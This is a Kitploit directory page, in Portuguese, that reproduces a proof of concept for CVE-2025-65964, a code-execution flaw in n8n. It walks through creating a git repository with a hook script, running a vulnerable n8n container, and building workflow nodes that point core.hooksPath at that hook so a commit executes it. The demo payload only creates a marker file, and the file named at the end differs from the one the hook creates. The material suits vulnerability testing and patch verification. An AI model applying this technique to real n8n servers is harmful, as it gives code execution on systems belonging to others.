Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-65964-Exploit — CVE-2025-65964 Reprodução | Kitploit
Ferramentas/GitHubGitHub/syzygy-k/cve-2025-65964-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubsyzygy-k/cve-2025-65964-exploit

CVE-2025-65964-Exploit

CVE-2025-65964 Reprodução

Ver Repositório
41há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Etapas de Reprodução

Primeiro, prepare um repositório contendo um arquivo malicioso

root@kitploit:~
mkdir n8n-rce-poc && cd n8n-rce-poc
git init
git remote add origin <仓库地址>

mkdir evil_hooks
echo '#!/bin/sh' > evil_hooks/pre-commit
echo 'touch /tmp/pwned_success' >> evil_hooks/pre-commit

chmod +x evil_hooks/pre-commit
git add evil_hooks/pre-commit
git update-index --chmod=+x evil_hooks/pre-commit

git commit -m "Add malicious hook"
git branch -M main
git push -u origin main

Em seguida, execute localmente um docker do n8n em uma versão vulnerável. A abrangência desta vulnerabilidade é grande: 0.123.1 ≤ n8n < 1.119.2 são afetados. Aqui usaremos a versão 1.64.3.

root@kitploit:~
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  n8nio/n8n:1.64.3

Primeiramente, o fluxo de ataque completo para a versão 1.64.3 é o seguinte:

image

Nó 1: Git (Action: Clone a repository)

A configuração dos parâmetros é mostrada na imagem:

image

Nó 2: Code (Mode: Run Once for All Items)

Este nó e o próximo existem porque o git só permite o Commit quando há alterações nos arquivos; portanto, precisamos primeiro gravar um arquivo qualquer no repositório.

A configuração dos parâmetros é mostrada na imagem:

image

Nó 3: Read/Write Files from Disk (Action: Write)

Grava o arquivo no repositório.

A configuração dos parâmetros é mostrada na imagem:

image

Nó 4 e 5: Git (Action: Add configuration property)

Esses dois nós existem porque o commit exige email e username; basta inventar os dois.

A configuração dos parâmetros é mostrada na imagem:

image image

Nó 6: Git (Action: Commit files or folders to git)

Etapa principal: aponta core.hooksPath para o diretório malicioso que baixamos, forçando o git a procurar na pasta especificada ao executar o hook (o padrão é .git/hooks).

(Na minha opinião, isso é da mesma categoria de sequestrar o LD_PRELOAD.)

A configuração dos parâmetros é mostrada na imagem:

image

Nó 7: Git (Action: Commit files or folders to git)

Esta etapa é usada para acionar a vulnerabilidade e executar o hook adulterado.

A configuração dos parâmetros é mostrada na imagem:

image

Depois de configurar esses nós, basta executar o workflow.

Em seguida, no docker, observe que o arquivo malicioso pwned_without_exec_node foi criado.

image
Baixar ferramenta